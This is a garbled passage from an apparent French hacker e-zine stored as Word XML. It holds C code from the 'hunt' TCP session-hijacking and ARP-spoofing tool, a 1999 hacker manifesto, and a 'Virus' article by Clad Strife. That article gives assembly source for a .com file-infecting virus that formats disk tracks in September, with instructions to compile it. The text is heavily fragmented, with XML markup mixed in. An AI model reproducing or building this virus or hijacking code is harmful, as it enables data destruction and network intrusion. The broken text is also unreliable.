p-&gt;p_hdr.p_tcph-&gt;de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f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int ht_eq(unsigned int key, struct conn_info *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 xml:space="preserve"> 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if (c-&gt;src_addr == p-&gt;p_iph-&gt;saddr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dst_addr == p-&gt;p_iph-&gt;d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src_port == p-&gt;p_hdr.p_tcph-&gt;source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dst_port == p-&gt;p_hdr.p_tcph-&gt;de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if (c-&gt;src_addr == p-&gt;p_iph-&gt;daddr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dst_addr == p-&gt;p_iph-&gt;s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src_port == p-&gt;p_hdr.p_tcph-&gt;dest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dst_port == p-&gt;p_hdr.p_tcph-&gt;sourc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return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end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int ht_eq(unsigned int key, struct conn_info *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 xml:space="preserve"> struct user_conn_info *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if (c-&gt;src_addr == uci-&gt;src_addr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dst_addr == uci-&gt;dst_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src_port == uci-&gt;src_port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dst_port == uci-&gt;dst_por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if (c-&gt;src_addr == uci-&gt;dst_addr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dst_addr == uci-&gt;src_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src_port == uci-&gt;dst_port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c-&gt;dst_port == uci-&gt;src_por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return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remove_conn_if_dont_match(voi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hash_iterator h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conn_info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nt count_to_remove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key_to_remov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conn_info **ci_to_remov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count_to_remove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key_to_remove = alloca(sizeof(unsigned int) * hash_count(&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ci_to_remove = alloca(sizeof(struct conn_info *) * hash_count(&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iter_set(&amp;hi, &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ci = hash_iter_get(&amp;hi, &amp;key)))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conn_add_match(ci-&gt;src_addr, ci-&gt;dst_addr, ci-&gt;src_port, ci-&gt;dst_por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ci_to_remove[count_to_remove] =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key_to_remove[count_to_remove++] =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iter_end(&amp;h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for ( ; count_to_remove &gt;= 0; count_to_remov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hash_remove(&amp;conn_table, key_to_remove[count_to_remov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ci_to_remove[count_to_remov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un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conn_free(struct conn_info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nt free_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mutex_lock(&amp;ci-&gt;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ci-&gt;use_count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free_it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free_it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mutex_unlock(&amp;ci-&gt;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free_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free(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conn_info *conn_get(struct user_conn_info *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conn_info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key = uci_generate_key(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ci = hash_get(&amp;conn_table, key, uci)))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thread_mutex_lock(&amp;ci-&gt;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i-&gt;use_cou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thread_mutex_unlock(&amp;ci-&gt;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un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return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t conn_exist(struct user_conn_info *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conn_info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key = uci_generate_key(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ci = hash_get(&amp;conn_table, key, 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int packet_match(struct packet_info *pi, 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iphdr *iph = p-&gt;p_i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tcphdr *tcph = p-&gt;p_hdr.p_tc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pi-&gt;src_addr == iph-&gt;s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pi-&gt;dst_addr == iph-&gt;d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pi-&gt;src_port == tcph-&gt;source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pi-&gt;dst_port == tcph-&gt;dest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pi-&gt;src.next_seq == tcph-&gt;seq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pi-&gt;src.next_d_seq == tcph-&gt;ack_seq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memcmp(pi-&gt;src.src_mac, p-&gt;p_ethh-&gt;h_source, ETH_ALEN) == 0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memcmp(pi-&gt;src.dst_mac, p-&gt;p_ethh-&gt;h_dest, ETH_ALEN)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int conn_skip_update(struct conn_info *ci, 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list_iterator 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packet_info *p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set(&amp;iter, &amp;l_skip_upda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pi = list_iter_get(&amp;iter)))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packet_match(pi, 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list_iter_end(&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list_remove(&amp;l_skip_update, p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return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end(&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return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__conn_add(struct packet *p, unsigned int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iphdr *iph = p-&gt;p_i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tcphdr *tcph = p-&gt;p_hdr.p_tc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conn_info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host_info *h_src, *h_d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ci = malloc(sizeof(struct conn_inf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ssert(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memset(ci, 0, sizeof(struct conn_inf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ci-&gt;use_count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mutex_init(&amp;ci-&gt;mutex,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ntohs(tcph-&gt;dest) &gt;= 1024 &amp;&amp; ntohs(tcph-&gt;source) &lt; 1024)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i-&gt;src_addr = iph-&gt;d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i-&gt;dst_addr = iph-&gt;s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i-&gt;src_port = tcph-&gt;de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i-&gt;dst_port = tcph-&gt;sourc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h_src = &amp;ci-&gt;d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h_dst = &amp;ci-&gt;sr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i-&gt;src_addr = iph-&gt;s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i-&gt;dst_addr = iph-&gt;d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i-&gt;src_port = tcph-&gt;sourc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i-&gt;dst_port = tcph-&gt;dest;</w:t>
        <w:tab/>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h_src = &amp;ci-&gt;sr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h_dst = &amp;ci-&gt;d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_src-&gt;next_seq = htonl(ntohl(tcph-&gt;seq) + p-&gt;p_data_len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tcph-&gt;syn ? 1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tcph-&gt;ac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h_src-&gt;next_d_seq = tcph-&gt;ack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_src-&gt;window = tcph-&gt;windo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_src-&gt;id = iph-&gt;i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memcpy(h_src-&gt;dst_mac, p-&gt;p_ethh-&gt;h_dest, ETH_A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memcpy(h_src-&gt;src_mac, p-&gt;p_ethh-&gt;h_source, ETH_A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guess or try to fill h_dst too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_dst-&gt;next_seq = h_src-&gt;next_d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_dst-&gt;next_d_seq = h_src-&gt;next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_dst-&gt;window = tcph-&gt;windo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_dst-&gt;id = iph-&gt;i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memcpy(h_dst-&gt;dst_mac, h_src-&gt;src_mac, ETH_A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memcpy(h_dst-&gt;src_mac, h_src-&gt;dst_mac, ETH_A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put(&amp;conn_table, key,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rint_new_conn_ind(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ack_storm_notify(struct conn_info *ci, struct user_conn_info *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timeval tv;</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nt print_it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ci-&gt;ack_storm_notify_sec)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gettimeofday(&amp;tv,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rint_it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gettimeofday(&amp;tv,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tv.tv_sec - ci-&gt;ack_storm_notify_sec &gt;= 1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print_it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print_i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set_tty_color(COLOR_BRIGHTR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rintf("\nhunt: possible ACK storm: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rint_user_conn_info(uci,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set_tty_color(COLOR_LIGHTGRA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i-&gt;ack_storm_notify_sec = tv.tv_se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conn_add_update(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atic struct user_conn_info last_toadd = {0, 0, 0,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atic int last_count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conn_info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user_conn_info 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old_next_d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fill_uci(&amp;uci,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key = uci_generate_key(&amp;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if ((ci = hash_get(&amp;conn_table, key, &amp;uci))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ht_eq(key, ci, &amp;uci) == 1)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conn_skip_update(ci, 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struct host_info *h_src, *h_d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struct iphdr *iph = p-&gt;p_i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struct tcphdr *tcph = p-&gt;p_hdr.p_tc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if (ci-&gt;src_addr == iph-&gt;s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ci-&gt;dst_addr == iph-&gt;d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ci-&gt;src_port == tcph-&gt;source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ci-&gt;dst_port == tcph-&gt;des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h_src = &amp;ci-&gt;sr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h_dst = &amp;ci-&gt;d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h_src = &amp;ci-&gt;d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h_dst = &amp;ci-&gt;sr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old_next_d_seq = h_src-&gt;next_d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h_src-&gt;next_seq = htonl(ntohl(tcph-&gt;seq) +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p-&gt;p_data_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if (tcph-&gt;ac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h_src-&gt;next_d_seq = tcph-&gt;ack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h_src-&gt;id = iph-&gt;id;</w:t>
        <w:tab/>
        <w:t>/* well, this should be in IP updater not in TC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h_src-&gt;window = tcph-&gt;windo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well these can change too :-)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memcpy(h_src-&gt;dst_mac, p-&gt;p_ethh-&gt;h_dest, ETH_A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memcpy(h_src-&gt;src_mac, p-&gt;p_ethh-&gt;h_source, ETH_A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 ACK storm detecti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h_src-&gt;delta_d_seq += ntohl(h_src-&gt;next_d_seq) -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ntohl(old_next_d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if (++ci-&gt;update_count % 400 == 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if (ci-&gt;src.delta_d_seq == 0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ci-&gt;dst.delta_d_seq == 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ck_storm_notify(ci, &amp;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ci-&gt;src.delta_d_seq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ci-&gt;dst.delta_d_seq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 xml:space="preserve"> /* test if we could add the connection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p-&gt;p_data_len &gt; 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 well, it contains data - add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if (conn_add_policy(p-&gt;p_iph, p-&gt;p_hdr.p_tc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__conn_add(p,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 well, check it this way because we don't wa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 to add RST, ACK to FIN, ... as connectino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if ((last_toadd.src_addr == p-&gt;p_iph-&gt;s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last_toadd.dst_addr == p-&gt;p_iph-&gt;d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last_toadd.src_port == p-&gt;p_hdr.p_tcph-&gt;source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last_toadd.dst_port == p-&gt;p_hdr.p_tcph-&gt;des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last_toadd.src_addr == p-&gt;p_iph-&gt;d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last_toadd.dst_addr == p-&gt;p_iph-&gt;s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last_toadd.src_port == p-&gt;p_hdr.p_tcph-&gt;dest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last_toadd.dst_port == p-&gt;p_hdr.p_tcph-&gt;sourc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if (++last_count &gt;= 1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last_count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if (conn_add_policy(p-&gt;p_iph, p-&gt;p_hdr.p_tc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__conn_add(p,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last_count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last_toadd.src_addr = p-&gt;p_iph-&gt;s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last_toadd.dst_addr = p-&gt;p_iph-&gt;d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last_toadd.src_port = p-&gt;p_hdr.p_tcph-&gt;sourc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last_toadd.dst_port = p-&gt;p_hdr.p_tcph-&gt;de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un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conn_del(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conn_info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user_conn_info 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nt remove_it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f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fill_uci(&amp;uci,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key = uci_generate_key(&amp;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ci = hash_remove(&amp;conn_table, key, &amp;uci)))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onn_free(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end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fill_uci(&amp;uci,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key = uci_generate_key(&amp;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if ((ci = hash_get(&amp;conn_table, key, &amp;uci))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ht_eq(key, ci, &amp;uci) == 1)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conn_skip_update(ci, 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if (p-&gt;p_iph-&gt;saddr == ci-&gt;src_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p-&gt;p_iph-&gt;daddr == ci-&gt;dst_addr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p-&gt;p_hdr.p_tcph-&gt;source == ci-&gt;src_port &amp;&a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p-&gt;p_hdr.p_tcph-&gt;dest == ci-&gt;dst_por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from source to des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w:t>
        <w:tab/>
        <w:t>if (p-&gt;p_hdr.p_tcph-&gt;seq == ci-&gt;dst.next_d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remove_it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from dest to sourc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if (p-&gt;p_hdr.p_tcph-&gt;seq == ci-&gt;src.next_d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remove_it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remove_i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ci == hash_remove(&amp;conn_table, key, &amp;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conn_free(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hash_un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hash_un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onn_add_update(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conn_add(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conn_info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user_conn_info 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fill_uci(&amp;uci,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key = uci_generate_key(&amp;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if ((ci = hash_get(&amp;conn_table, key, &amp;uci)) &amp;&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ht_eq(key, ci, &amp;uci) == 1)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conn_add_update(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f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ci = hash_remove(&amp;conn_table, key, &amp;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hash_un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conn_free(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hash_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end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__conn_add(p,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un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conn_update_table(struct packet *p, struct ethhdr *ethh, struct iphdr *i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tcphdr *tcph = p-&gt;p_hdr.p_tc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tcph-&gt;syn &amp;&amp; !tcph-&gt;ack)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conn_add_policy(iph, tcph))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conn_add(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 if (tcph-&gt;rst || tcph-&gt;fin)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conn_add_policy(iph, tc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end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conn_del(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conn_add_policy(iph, tc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end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conn_add_update(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function list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process_tcp(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ifunc_item *l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list_iterator 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set(&amp;iter, &amp;l_ifunc_tc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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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end(&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process_udp(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ifunc_item *l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list_iterator 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set(&amp;iter, &amp;l_ifunc_ud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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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end(&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process_icmp(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ifunc_item *l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list_iterator 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set(&amp;iter, &amp;l_ifunc_ic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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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end(&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process_arp(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ifunc_item *l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list_iterator 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set(&amp;iter, &amp;l_ifunc_ar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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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end(&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process_ip(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ifunc_item *l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list_iterator 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set(&amp;iter, &amp;l_ifunc_i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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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end(&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sample of ifun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f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list m_packet_list = LIST_INIT(struct packet, p_next[MODULE_N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m_func_tcp(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want_i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acket_want(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list_produce(&amp;m_packet_lis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end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inline void fast_tcp_process(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list_iterator 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ifunc_item *l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lock(&amp;l_ifunc_fast_tc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set(&amp;iter, &amp;l_ifunc_fast_tc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li = list_iter_get(&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li-&gt;func(p, li-&gt;ar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iter_end(&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list_unlock(&amp;l_ifunc_fast_tc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mac_table_update(unsigned int ip, char *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mac_info *m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lock(&amp;mac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mi = hash_get(&amp;mac_table, ip, NULL)))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memcmp(mi-&gt;mac, mac, sizeof(mi-&gt;mac)))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pthread_mutex_lock(&amp;mi-&gt;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memcpy(mi-&gt;mac, mac, sizeof(mi-&gt;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pthread_mutex_unlock(&amp;mi-&gt;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mi = malloc(sizeof(struct mac_inf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ssert(m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memcpy(mi-&gt;mac, mac, sizeof(mi-&gt;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thread_mutex_init(&amp;mi-&gt;mutex,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hash_put(&amp;mac_table, ip, m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unlock(&amp;mac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ruct mac_info *mac_info_get(unsigned int i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mac_info *m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lock(&amp;mac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mi = hash_get(&amp;mac_table, ip, NULL)))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thread_mutex_lock(&amp;mi-&gt;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unlock(&amp;mac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return m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mac_info_release(struct mac_info *m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mutex_unlock(&amp;mi-&gt;mut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mac_arp_learn(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i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char *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arpeth_hdr *arpeth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rpethh = (struct arpeth_hdr *)(p-&gt;p_arph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p-&gt;p_arph-&gt;ar_op == htons(ARPOP_REPLY)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p-&gt;p_arph-&gt;ar_op == htons(ARPOP_REQUES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p = *(unsigned int *) arpethh-&gt;ar_si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mac = arpethh-&gt;ar_sha;</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memcmp(mac, p-&gt;p_ethh-&gt;h_source, ETH_ALEN)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mac_table_update(ip, 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fprintf(stderr, "ARP: MAC src != ARP src for host %s\n", host_lookup(ip, hl_m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void mac_ip_learn(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i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char *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p = p-&gt;p_iph-&gt;s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mac = p-&gt;p_ethh-&gt;h_sourc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mac_table_update(ip, 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 well, don't learn mac addresses from dst as they can be spoof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 (even though check can be ma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hu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unsigned int pkts_received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unsigned int pkts_dropped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unsigned int pkts_unhandled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unsigned int bytes_received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hunt(void *ar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packet *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ethhdr *eth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iphdr *i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fdef WITH_RECVMS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msghdr ms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sockaddr_pkt spk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iovec iov;</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end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sigmask(SIG_BLOCK, &amp;intr_mask,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verbo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rintf("hunt pid %d\n", getpi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dd_telnet_rlogin_polic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hash_init(&amp;conn_table, 100, (hash_equal_func)ht_eq)) { /* Initialize hash table of connection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error("hash_in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exit(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hash_init(&amp;mac_table, 100, NULL))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error("hash in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exit(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linksock = tap(eth_device, 1);                /* Setup link socket */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linksock &lt; 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error("linksoc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exit(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acket_preallocate(64);</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rintf("starting hunt\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etpriority(PRIO_PROCESS, getpid(), -2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mutex_lock(&amp;mutex_hunt_read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unt_ready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cond_signal(&amp;cond_hunt_read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thread_mutex_unlock(&amp;mutex_hunt_read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1)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p = packet_new()))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fprintf(stderr, "can't get free packet - out of memory\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exit(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fdef WITH_RECVMS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memset(&amp;msg, 0, sizeof(ms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msg.msg_name = &amp;spk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msg.msg_namelen = sizeof(spk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msg.msg_iovlen =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msg.msg_iov = &amp;iov;</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ov.iov_base = p-&gt;p_ra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ov.iov_len = sizeof(p-&gt;p_ra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p-&gt;p_raw_len = recvmsg(linksock, &amp;msg, 0)) &gt;=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p-&gt;p_raw_len = recv(linksock, p-&gt;p_raw, sizeof(p-&gt;p_raw), 0)) &gt;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end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pkts_receiv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bytes_received += p-&gt;p_raw_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 don't do continue or break without packet_fre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if (p-&gt;p_raw_len &lt; 14)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pkts_dropp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goto co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LIGNPOINTERS_ETH(p, eth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p-&gt;p_ethh = eth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 in order to speed thinks as mutch as posible for arp stuff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 the timestamp is moved to swtich p-&gt;p_timestamp = time(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p-&gt;p_timestamp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switch (ntohs(ethh-&gt;h_proto))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case ETH_P_I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p-&gt;p_timestamp = time(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if (p-&gt;p_raw_len &lt; 14 + 2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pkts_dropp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goto co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LIGNPOINTERS_IP(ethh, i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p-&gt;p_iph = i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if (in_cksum((unsigned short *) i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 xml:space="preserve">     IP_HDR_LENGTH(iph)) == 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if (mac_learn_from_i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mac_ip_learn(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process_ip(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drop IP fragments and ip packet len &gt; p_raw_len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if ((ntohs(iph-&gt;frag_off) &amp; IP_OFFMASK) != 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ntohs(iph-&gt;frag_off) &amp; IP_MF)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IP_HDR_LENGTH(iph) + IP_DATA_LENGTH(iph)) &gt; p-&gt;p_raw_len)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pkts_dropp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goto co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switch (iph-&gt;protocol)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case IPPROTO_TC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if (p-&gt;p_raw_len &lt; 14 + IP_HDR_LENGTH(iph) + 2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pkts_dropp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goto co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p-&gt;p_type = PACKET_TC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LIGNPOINTERS_TCP(iph, p-&gt;p_hdr.p_tc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ab/>
        <w:t xml:space="preserve">  p-&gt;p_data);</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p-&gt;p_data_len = TCP_DATA_LENGTH(iph, p-&gt;p_hdr.p_tc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 xml:space="preserve">if (ip_in_cksum(iph, (unsigned short *) p-&gt;p_hdr.p_tcph,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 xml:space="preserve">    IP_DATA_LENGTH(iph)) == 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conn_update_table(p, ethh, i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fast_tcp_process(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process_tcp(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 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pkts_dropp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brea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case IPPROTO_UD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if (p-&gt;p_raw_len &lt; 14 + IP_HDR_LENGTH(iph) + 8)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pkts_dropp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goto co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p-&gt;p_type = PACKET_UD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 xml:space="preserve">ALIGNPOINTERS_UDP(iph, p-&gt;p_hdr.p_udph,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ab/>
        <w:t xml:space="preserve">  p-&gt;p_data);</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 check the UDP checksum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process_udp(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brea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case IPPROTO_IC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if (p-&gt;p_raw_len &lt; 14 + IP_HDR_LENGTH(iph) + 8)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pkts_dropp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goto co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p-&gt;p_type = PACKET_IC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LIGNPOINTERS_ICMP(iph, p-&gt;p_hdr.p_icm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ab/>
        <w:t xml:space="preserve">   p-&gt;p_data);</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if (in_cksum((unsigned short *) p-&gt;p_hdr.p_icm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 xml:space="preserve">    IP_DATA_LENGTH(iph)) == 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process_icmp(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 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ab/>
        <w:t>pkts_dropp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brea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defaul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pkts_unhandl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brea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pkts_dropped++; /* bad IP checksum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rea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case ETH_P_AR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if (p-&gt;p_raw_len &lt; 14 + 28)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pkts_dropp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goto co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p-&gt;p_type = PACKET_AR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LIGNPOINTERS_ARP(ethh, p-&gt;p_arp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do process arp first - in order to do it as fas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as posible arpspoof needs i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process_arp(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p-&gt;p_timestamp = time(NULL); /* well, the process_arp does not get timestamp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mac_arp_learn(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rea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defaul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pkts_unhandl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rea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co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acket_free(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return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helper function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print_tcp(struct iphdr *ip, struct tcphdr *tc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fprintf(stdout, "%s [%d] seq=(%u) ack=(%u)\t---&gt;\t%s [%d]\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host_lookup(ip-&gt;saddr, hl_mode), ntohs(tcp-&gt;sourc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unsigned int) ntohl(tcp-&gt;seq), tcp-&gt;ack ? (unsigned int) ntohl(tcp-&gt;ack_seq)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xml:space="preserve">       host_lookup(ip-&gt;daddr, hl_mode), ntohs(tcp-&gt;des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tic int fill_space_to(char *b, int pos, int wher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pos &gt;= 0 &amp;&amp; pos &lt; wher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sprintf(b, "%*s", where - po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t conn_list(struct user_conn_info **ruci, char **rbuf, int with_mac, int with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hash_iterator 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conn_info *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user_conn_info *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nt i, cou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char *b, *b_old, *bu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count = hash_count(&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coun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hash_un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r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ruci =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rbu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rbuf =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urn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rbuf)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buf = malloc(count * 512);</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ssert(bu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b = bu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b = buf =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ruci)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uci = malloc(count * sizeof(struct user_conn_inf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ssert(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 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uci = NUL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iter_set(&amp;iter, &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ci = hash_iter_get(&amp;iter, NULL)) &amp;&amp; i &lt; coun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b)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b_old = b;</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b += sprintf(b, "%d) %s [%s]", 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w:t>
        <w:tab/>
        <w:t xml:space="preserve">     host_lookup(ci-&gt;src_addr, hl_m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port_lookup(ci-&gt;src_port, hl_m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b += fill_space_to(b, b - b_old, 3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b += sprintf(b, " --&g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b += sprintf(b, "%s [%s]\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host_lookup(ci-&gt;dst_addr, hl_m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 xml:space="preserve">     port_lookup(ci-&gt;dst_port, hl_m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if (with_seq)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_old = b;</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b, "     seq=(%u) ack=(%u)",</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unsigned int) ntohl(ci-&gt;src.next_seq), (unsigned int) ntohl(ci-&gt;src.next_d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fill_space_to(b, b - b_old, 45);</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b, " seq=(%u) ack=(%u)\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ab/>
        <w:t>(unsigned int) ntohl(ci-&gt;dst.next_seq), (unsigned int) ntohl(ci-&gt;dst.next_d_seq));</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if (with_mac)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_old = b;</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b, "     src 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_eth_mac(b, ci-&gt;src.src_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fill_space_to(b, b - b_old, 45);</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b, " src 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_eth_mac(b, ci-&gt;dst.src_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b, "\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_old = b;</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b, "     dst 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_eth_mac(b, ci-&gt;src.dst_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fill_space_to(b, b - b_old, 45);</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b, " dst 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_eth_mac(b, ci-&gt;dst.dst_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ab/>
        <w:t>b += sprintf(b, "\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uci)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uci[i].src_addr = ci-&gt;src_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uci[i].dst_addr = ci-&gt;dst_add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uci[i].src_port = ci-&gt;src_por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uci[i].dst_port = ci-&gt;dst_por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iter_end(&amp;i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unlock(&amp;conn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r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uci = uc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f (rbu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buf = bu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return cou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print_mac_table(voi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hash_iterator h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char buf[BUFSIZ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unsigned int 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struct mac_info *m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nt i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printf("--- mac table ---\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iter_set(&amp;hi, &amp;mac_tab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hile ((mi = hash_iter_get(&amp;hi, &amp;key)))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sprintf_eth_mac(buf, mi-&gt;ma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rintf("%-24s %s\n", host_lookup(key, hl_mode), bu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if (++i % lines_o ==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lines_o_press_ke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hash_iter_end(&amp;h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oid print_user_conn_info(struct user_conn_info *uci, int cou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int i, re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for (i = 0; i &lt; count; i++)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ret = printf("%d) %s [%s]", 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 xml:space="preserve">       </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     host_lookup(uci-&gt;src_addr, hl_m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ab/>
        <w:t xml:space="preserve">     port_lookup(uci-&gt;src_port, hl_m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rintf("%*s", 25 - ret &gt; 0 ? 20 - ret : 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printf(" --&g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 xml:space="preserve">printf("%s [%s]\n",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 xml:space="preserve">       host_lookup(uci-&gt;dst_addr, hl_m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ab/>
        <w:t xml:space="preserve">       port_lookup(uci-&gt;dst_port, hl_m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b/>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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Quoi de plus sur cette version 1.4:</w:t>
      </w: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poofing des cibles qui sont disconnectées ou hors-service et il peut ne pas intercepter certains packets spécifiqu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Où télécharger les Hu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tp://ftp.gncz.cz/pub/linux/hu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000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Auteur de l'article: Clad Strif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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Article original pour IGA</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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>A l'aube du nouveau millénaire, par Clad Strife</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>|</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Il n'était qu'une pâle lumière dans la nuit</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Alors vous l'avez pourchassé, persécuté, détruit</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Et la lumière s'est éteinte, et avec elle est né</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Le début de ce qui sera "l'ère de l'underground"</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Alors que nous sommes à l'aube de la connaissance</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A l'aube de vous prouver que vous n'êtes pas seuls à savoir, à pouvoir, à comprendre</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A l'aube de vous faire imaginer que vous n'êtes pas les seuls constructeurs</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Vous nous détruisez.</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Nous nous bouffons entre nous,</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Nous nous aidons entre nous.</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Vous construisez avec nous, sur nous.</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Mais sans nous, vous ne serez rien.</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A l'aube d'un nouveau millenaire,</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A la naissance d'une nouvelle generation de gens</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Vous qui avez le savoir, les moyens, en recherchez le monopole</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t>En détruisant une communauté, la nôtre: celle des Hackers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>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color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Clad Strife, le 19 novembre 1999. A l'aube du nouveau millénaire.</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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>, par Clad Strif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t>Virus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>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J'ai dressé une liste de quelques virus dont il est important de connaitre les fonctionnalités. Je donnerais aussi des codes sources de virus en assembleur. Bah et si on commençait par les codes sources, pour être sur de bien pouvoir les compiler: transposez les en txt avec Bloc-Notes en copiant collant, et renommez le .txt en .asm puis compilez:</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SAD vir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 Data Segment Value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ds:[0f6h] = read buffer locati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ds:[0f8h] = write buffer locati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ds:[0fah] = store length of virus at this locati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ds:[0fch] = store length of file to be infected at this locati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ds:[0feh] = filename of file to infec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model tin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c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org     100h               ; origin for .com fil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tar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nop                     ; these two nop instructs will be used by 'Nast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nop                     ; to determine if a file is already infect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get da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2ah              ; get the da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cmp dh,09h              ; is it Septemb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nz do_not_activate     ; if NO jmp do_not_activa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the nasty b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1. Print messag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lea dx,mess             ; print messag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09               ; 'Nasty in Septemb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2. Destroy dis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19h              ; get current drive (returned in a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l,al               ; dl = drive # to be format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05               ; disk format functi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l,01               ; first secto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h,00               ; first trac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h,00               ; head zer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l,10h              ; 10h (16) sectors - 2 track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13h                 ; do it (overwrite first 16 tracks on currentl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selected dis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do_not_activa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80h              ; save parameters; set counter to 80h byt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si,0080h            ; offset in the current data segment of the by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to be copi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i,0ff7fh           ; offset to which byte is to be mov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rep movsb               ; move bytes until cx=0 (decrement cx by 1 each tim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loop is performed is done automaticall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increment by 1 of si &amp; di is done automaticall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lea ax,begp             ; load exit from program offset address into a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ax               ;  "    "    "     "       "      "      "   c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sub ax,100h             ; subtract start of .com file address (100h) from a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ax now contains the length of the viru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s:[0fah],ax        ; put length of the virus into the data segment a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offset 0fa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add cx,fso              ; add fso (5h) to cx (offset address of ex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so, cx=cx+5</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s:[0f8h],cx        ; move cx (end of virus + 5) into data segment a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offset 0f8h. ** Start of the write buff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ADD CX,AX               ; add virus length (ax) to cx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s:[0f6h],cx        ; mov cx into data segment at offset 0f6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 Start of the read buff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ax               ; mov length of virus into c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lea si,start            ; load address of 'start' (start of virus) int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souce ind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i,ds:[0f8h]        ; mov the value of the write buffer (@ 0f8h) int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destination inde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rb:                        ; cx = counter (length of viru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si = offset of byte to be rea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di = offset of where to write byte t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auto decrement of cx &amp; increment of si &amp; d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rep movsb               ; copy the virus into memor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stc                     ; set the carry fla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lea dx,file_type_to_infect     ; set infector for .com files onl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4eh                     ; find first file with specified param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20h                     ; files with archive bit se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if file found, CF is cleared, els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CF is se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or ax,ax                ; works the below instructions (jz &amp; jm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z file_found           ; if file found jmp file_foun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mp done                ; if no file found, jmp done (exit viru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file_foun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2fh              ; get dta (returned in es:b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es:[bx+1ah]      ; mov size of file to be infected into a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s:[0fch],ax        ; mov filesize into ds:[0fc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add bx,1eh              ; bx now points to asciz filenam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s:[0feh],bx        ; mov filename into ds:[0fe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clc                     ; clear carry fla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3d02h            ; open file for r/w (ds:dx -&gt; asciz filenam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bx               ; mov filename into d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 (ax contains file hand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bx,ax               ; mov file handle into b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5700h            ; get time &amp; date attribs from file to infec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 (file handle in b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push cx                 ; save time to the stac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push dx                 ; save date to the stac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3fh              ; read from file to be infect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ds:[0fch]        ; number of bytes to be read (filesize of file t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be infect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ds:[0f6h]        ; buffer (where to read bytes t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bx,dx               ; mov buffer location to b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bx]             ; mov contents of bx (first two bytes - as bx i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16-bits) into a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Now check to see if file is infected... if th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file is infected, it's first two bytes will b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9090h (nop no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sub ax,9090h            ; If file is already infected, zero flag will be se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thus jump to fin(is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z fi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ds:[0fch]        ; mov filesize of file to be infected into a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bx,ds:[0f6h]        ; mov where-to-read-to buffer into b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bx-2],ax      ; correct old le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3ch              ; Create file with hand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00h              ; cx=attribs -- set no attribut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ds:[0feh]        ; point to nam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clc                     ; clear carry fla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create fi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Note: If filename already exists, (which it do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truncate the filelength to zero - this is ok a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we have already copied the file to be infect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into memor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bx,ax               ; mov file handle into b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40h              ; write file with handle (write to the file to b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infected) - length currently zer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cx=number of bytes to wri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ds:[0fch]        ; length of file to be infect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add cx,ds:[0fah]        ; length of viru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ds:[0f8h]        ; location of write buffer (this contains the viru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 the file to be infect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write fi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new file = virus + file to be infecte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5701h            ; restore original time &amp; date valu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pop dx                  ; get old date from the stac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pop cx                  ; get old time from the stack</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Note: Infected file will now carry the time &amp; da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it had before the infecti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3eh              ; close file (bx=file hand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Note: date &amp; time stamps automatically updated if</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file written t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fi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stc                     ; set carry flag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4fh              ; find next file (.com)</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or ax,ax                ; decides zero flag outcom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nz done                ; if no more .com files, jmp don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MP file_found          ;   else begin re-infection process for new fi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don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80h              ; set counter (cx) = 80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si,0ff7fh           ; source offset address (copy from her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i,0080h            ; destination offset address (copy to her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rep movsb               ; copy bytes! (cx is auto decremented by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si &amp; di are auto incremented by 1)</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Note: this is a 'restore parameters' featur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this does the reverse of what what done earli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in the program (do_not_activa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0a4f3h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s:[0fff9h],ax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l,0eah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s:[0fffbh],al      ; reset data segment locations ??? (to previou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100h             ;   values before virus infecti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s:[0fffch],ax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lea si,begp             ; load exit from program offset address into s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lea di,start            ; load offset address of start of virus into di</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c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s:[0fffeh],ax      ; re-align cs = d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kk,a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fso</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db 0eah                 ; define by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dw 0fff9h               ; define wor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kk dw 0000h             ; define kk = wor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ess db 'Sad virus - 24/8/91',13,10,'$'    ; virus message to displa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file_type_to_infect db '*?.com',0         ; infect only .com fil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fso dw 0005h            ; store 5 into 'fso'. dw means that fso is 2 byt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in size (a wor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 alma ma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beg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4c00h        ; normal dos termination (set al to 0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do i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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
